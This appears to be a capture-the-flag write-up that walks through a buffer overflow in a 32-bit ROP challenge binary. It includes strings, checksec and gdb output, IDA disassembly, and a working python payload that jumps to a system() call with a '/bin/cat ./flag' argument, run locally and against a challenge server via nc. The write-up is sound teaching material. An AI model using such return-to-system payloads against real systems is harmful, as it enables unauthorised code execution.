While the CTF is over. I still wanted to take a crack at solving some of these ROP challenges on my own. Enter ROP 200.
I wanted to keep the same work-flow I used for the previous binary challenge.
What kind of file am I working with
$ file re200
re200: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=2d25ab699b8453596f8655d9ed85ff65fe1dc86c, not stripped
From the strings output I could see that this binary is using the same .c file:rop100.c as the previous binary. Also there appears to be a new function:data and some interesting strings:/bin/cat ./flag.
Strings output
```
$ strings re200
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
fflush
fopen
puts
stdin
printf
fgets
stdout
fclose
system
setbuf
__libc_start_main
__gmon_start__
GLIBC_2.1
GLIBC_2.0
PTRh0
QVhv
[^_]
lag.txt
Please complete today's assingment:
Greetings class, Dr. Chain here, Does anyone how to get around an NX enabled binary? Today's lesson is to use what's in front of you!
Input:
;*2$"
Hello world!
This is the second string
/bin/answer
/bin/cat ./flag
10: print 'homework' 20: GOTO 10flag.txt
Shellcode: C
/bin/cat ./assignment.txt
GCC: (Ubuntu 4.8.4-2ubuntu1~14.04.4) 4.8.4
GCC: (Ubuntu 4.8.4-2ubuntu1~14.04.3) 4.8.4
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rel.dyn
.rel.plt
.init
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.jcr
.dynamic
.got
.got.plt
.data
.bss
.comment
crtstuff.c
__JCR_LIST__
deregister_tm_clones
register_tm_clones
__do_global_dtors_aux
completed.6600
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
rop100.c
__FRAME_END__
__JCR_END__
__init_array_end
_DYNAMIC
__init_array_start
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
setbuf@@GLIBC_2.0
_ITM_deregisterTMCloneTable
__x86.get_pc_thunk.bx
data_start
printf@@GLIBC_2.0
fflush@@GLIBC_2.0
fgets@@GLIBC_2.0
_edata
fclose@@GLIBC_2.1
_fini
string3
string1
string5
string7
overflow
__data_start
puts@@GLIBC_2.0
system@@GLIBC_2.0
__gmon_start__
__dso_handle
_IO_stdin_used
data
__libc_start_main@@GLIBC_2.0
__libc_csu_init
stdin@@GLIBC_2.0
fopen@@GLIBC_2.1
_end
_start
_fp_hw
stdout@@GLIBC_2.0
__bss_start
main
string4
string2
_Jv_RegisterClasses
string8
string6
__TMC_END__
_ITM_registerTMCloneTable
_init
```
The security check shows nothing new.
Checksec
gdb-peda$ checksec
CANARY : disabled
FORTIFY : disabled
NX : ENABLED
PIE : disabled
RELRO : Partial
Testing also reveals that there is an overflow after entering a certain number of characters. Duh.
Testing
$ ./re200
Greetings class, Dr. Chain here, Does anyone how to get around an NX enabled binary? Today's lesson is to use what's in front of you!
Input:FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
Segmentation fault
Again this looks the same as before.
Testing with the debugger
gdb-peda$ r
Starting program: /home/evan/re200
Greetings class, Dr. Chain here, Does anyone how to get around an NX enabled binary? Today's lesson is to use what's in front of you!
Input:FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
[----------------------------------registers-----------------------------------]
EAX: 0xffffd500 ('F' , "\n")
EBX: 0x0
ECX: 0xf7fad89c --> 0x0
EDX: 0xffffd500 ('F' , "\n")
ESI: 0xf7fac000 --> 0x1d4d6c
EDI: 0x0
EBP: 0x46464646 ('FFFF')
ESP: 0xffffd530 --> 0x8048800 ("t of you!")
EIP: 0xa464646 ('FFF\n')
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0xa464646
[------------------------------------stack-------------------------------------]
0000| 0xffffd530 --> 0x8048800 ("t of you!")
0004| 0xffffd534 --> 0x0
0008| 0xffffd538 --> 0x80486cb (<__libc_csu_init+11>: add ebx,0x1935)
0012| 0xffffd53c --> 0x0
0016| 0xffffd540 --> 0xf7fac000 --> 0x1d4d6c
0020| 0xffffd544 --> 0xf7fac000 --> 0x1d4d6c
0024| 0xffffd548 --> 0x0
0028| 0xffffd54c --> 0xf7defe81 (<__libc_start_main+241>: add esp,0x10)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x0a464646 in ?? ()
gdb-peda$ i r
eax 0xffffd500 0xffffd500
ecx 0xf7fad89c 0xf7fad89c
edx 0xffffd500 0xffffd500
ebx 0x0 0x0
esp 0xffffd530 0xffffd530
ebp 0x46464646 0x46464646
esi 0xf7fac000 0xf7fac000
edi 0x0 0x0
eip 0xa464646 0xa464646
eflags 0x10246 [ PF ZF IF RF ]
cs 0x23 0x23
ss 0x2b 0x2b
ds 0x2b 0x2b
es 0x2b 0x2b
fs 0x0 0x0
gs 0x63 0x63
After looking further into the binary via IDA. I can see that string4 is attached to /bin/cat ./flag. Taking note of the address 0804A0C0 as it should come in use later.
.data:0804A0C0 string4 db '/bin/cat ./flag',0
I then took a look at the new function:data. I can see that address 08048644 is using string8. I wonder if I can overwrite that with 0804A0C0 which is string4. The next address 0804864B is calling system which expects the address of string8. Which I plan to replace with the address of string4.
.text:08048632 public data
.text:08048632 data proc near
.text:08048632 push ebp
.text:08048633 mov ebp, esp
.text:08048635 sub esp, 18h
.text:08048638 mov dword ptr [esp], offset format ; "Please complete today's assingment:"
.text:0804863F call _printf
.text:08048644 mov dword ptr [esp], offset string8 ; "/bin/cat ./assignment.txt"
.text:0804864B call _system
.text:08048650 leave
.text:08048651 retn
.text:08048651 data endp
Again after reading the posts here:http://codearcana.com/posts/2013/05/28/introduction-to-return-oriented-programming-rop.html. I can see I can chain the addresses together.
Payload
$ cat flag
Rop200!
$ python -c 'print "A" * 0x28 + "FFFF" + "\x4B\x86\x04\x08" + "\xC0\xA0\x04\x08"' | ./re200
Greetings class, Dr. Chain here, Does anyone how to get around an NX enabled binary? Today's lesson is to use what's in front of you!
Input:Rop200!
Segmentation fault
The payload works locally now to test it on the server.
$ python -c 'print "A" * 0x28 + "FFFF" + "\x4B\x86\x04\x08" + "\xC0\xA0\x04\x08"' | nc x.x.x.x 8193
Greetings class, Dr. Chain here, Does anyone how to get around an NX enabled binary? Today's lesson is to use what's in front of you!
Input:ctf{06d671752a7d2fa90b162500ddc325ad}
Hooray!